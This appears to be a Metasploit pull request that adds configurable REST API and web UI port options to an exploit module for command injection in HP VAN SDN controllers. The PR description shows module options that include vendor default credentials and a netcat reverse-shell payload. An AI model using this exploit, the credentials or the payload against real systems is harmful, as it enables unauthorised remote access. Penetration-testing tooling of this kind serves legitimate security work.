### PR TITLE
Add WEBUI_PORT to hp_van_sdn_cmd_inject exploit

### DIFF
--- a/documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md
+++ b/documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md
@@ -18,6 +18,14 @@ Tested on 2.7.18.0503.
 
 ## Options
 
+**RPORT**
+
+Set this to the port for the REST API, usually 8081.
+
+**WEBUI_PORT**
+
+Set this to the port for the web UI, usually 8443.
+
 **TOKEN**
 
 Set this to the service token. Defaults to `AuroraSdnToken37`.

--- a/modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb
+++ b/modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb
@@ -56,10 +56,12 @@ class MetasploitModule < Msf::Exploit::Remote
         ]
       ],
       'DefaultTarget'      => 0,
-      'DefaultOptions'     => {'RPORT' => 8081, 'SSL' => true}
+      'DefaultOptions'     => {'SSL' => true}
     ))
 
     register_options([
+      OptPort.new('RPORT',      [true,  'REST API port', 8081]),
+      OptPort.new('WEBUI_PORT', [true,  'Web UI port for creds login', 8443]),
       OptString.new('TOKEN',    [false, 'Service token', 'AuroraSdnToken37']),
       OptString.new('USERNAME', [false, 'Service username', 'sdn']),
       OptString.new('PASSWORD', [false, 'Service password', 'skyline'])
@@ -189,7 +191,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method'    => 'POST',
       'uri'       => '/sdn/ui/app/login',
-      'rport'     => 8443,
+      'rport'     => datastore['WEBUI_PORT'],
       'vars_post' => {'username' => username, 'password' => password}
     )
 


### PR DESCRIPTION
```
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > options

Module options (exploit/linux/http/hp_van_sdn_cmd_inject):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   PASSWORD    skyline           no        Service password
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target address range or CIDR identifier
   RPORT       8081              yes       REST API port (TCP)
   SSL         true              no        Negotiate SSL/TLS for outgoing connections
   TOKEN       AuroraSdnToken37  no        Service token
   USERNAME    sdn               no        Service username
   VHOST                         no        HTTP server virtual host
   WEBUI_PORT  8443              yes       Web UI port for creds login


Payload options (cmd/unix/reverse_netcat_gaping):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix In-Memory


msf5 exploit(linux/http/hp_van_sdn_cmd_inject) >
```

Updates #10219.